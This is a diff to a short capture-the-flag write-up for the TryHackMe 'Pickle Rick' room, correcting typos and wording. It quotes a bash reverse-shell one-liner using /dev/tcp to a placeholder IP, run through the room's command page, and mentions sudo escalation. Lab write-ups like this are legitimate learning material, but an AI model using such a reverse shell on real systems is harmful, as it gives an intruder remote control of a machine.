simonmoseley/THM-Writeups/pickleRick/Pickle_Rick_WriteUp.md

 ![root3](https://user-images.githubusercontent.com/90977933/133955061-677b23f5-a661-44ee-8115-c8a7e1d33eb8.png)

-This lab was a quick and easy room that didn't require you to gain access to solve.
+This lab was a quick and easy room that didn't require you to gain access to retrieve the final flag.
-I did go back and try tp gain access using a reverse shell and had success with
+I did go back and try to gain access using a reverse shell and had success with executing

 **Bash -c \'bash -I >& /dev/tcp/IP address/8080 0>&1\'**

-From there it was the same sudo -l commands to find the final flag.
+in the command webpage.
+From there it was the same sudo commands to find the final flag.

 -Simon